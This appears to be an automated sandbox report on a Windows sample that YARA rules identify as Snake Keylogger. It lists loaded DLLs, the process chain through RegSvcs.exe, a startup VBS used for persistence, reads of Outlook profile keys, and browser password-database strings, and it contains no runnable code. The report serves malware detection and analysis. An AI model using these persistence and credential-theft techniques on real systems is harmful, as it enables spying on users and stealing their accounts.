Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637B6D8	10_2_0637B6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06375EC8	10_2_06375EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06373730	10_2_06373730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06376320	10_2_06376320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06376312	10_2_06376312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06376778	10_2_06376778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637C378	10_2_0637C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637676A	10_2_0637676A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063733B8	10_2_063733B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063733A8	10_2_063733A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637A3FA	10_2_0637A3FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06376BD0	10_2_06376BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06376BC1	10_2_06376BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06374430	10_2_06374430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06372818	10_2_06372818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637D018	10_2_0637D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06372807	10_2_06372807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06370006	10_2_06370006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06377050	10_2_06377050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06370040	10_2_06370040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06377040	10_2_06377040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063774A8	10_2_063774A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06377497	10_2_06377497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637B090	10_2_0637B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06370498	10_2_06370498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06370488	10_2_06370488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063708F0	10_2_063708F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063778F0	10_2_063778F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063708E0	10_2_063708E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06370D39	10_2_06370D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637BD28	10_2_0637BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06377900	10_2_06377900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06377D58	10_2_06377D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06370D48	10_2_06370D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06377D48	10_2_06377D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063781B0	10_2_063781B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063781A0	10_2_063781A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06371191	10_2_06371191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06375198	10_2_06375198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637518A	10_2_0637518A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_063785FC	10_2_063785FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0637C9C8	10_2_0637C9C8

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: String function: 0013F9F2 appears 31 times
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: String function: 00140A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 002DF9F2 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 002E0A30 appears 46 times

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior

Source: PsBygexGwH.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 6.2.name.exe.3910000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.name.exe.3910000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.name.exe.3910000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.name.exe.3910000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.name.exe.40c0000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.name.exe.40c0000.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.name.exe.40c0000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.name.exe.40c0000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/10@3/3

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_001937B5 GetLastError,FormatMessageW,

0_2_001937B5

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001810BF AdjustTokenPrivileges,CloseHandle,	0_2_001810BF
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_001816C3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_003210BF AdjustTokenPrivileges,CloseHandle,	6_2_003210BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_003216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	6_2_003216C3

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_001951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_001951CD

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_001AA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_001AA67C

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_0019648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0019648E

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_001242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001242A2

Source: C:\Users\user\Desktop\PsBygexGwH.exe

File created: C:\Users\user\AppData\Local\directory

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\PsBygexGwH.exe

File created: C:\Users\user\AppData\Local\Temp\aut1009.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: PsBygexGwH.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.4088699250.000000000279A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000027A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000278A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002A5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PsBygexGwH.exe	ReversingLabs: Detection: 65%
Source: PsBygexGwH.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\PsBygexGwH.exe

File read: C:\Users\user\Desktop\PsBygexGwH.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PsBygexGwH.exe "C:\Users\user\Desktop\PsBygexGwH.exe"
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\PsBygexGwH.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PsBygexGwH.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\PsBygexGwH.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PsBygexGwH.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PsBygexGwH.exe

Static file information: File size 1130496 > 1048576

Source: PsBygexGwH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
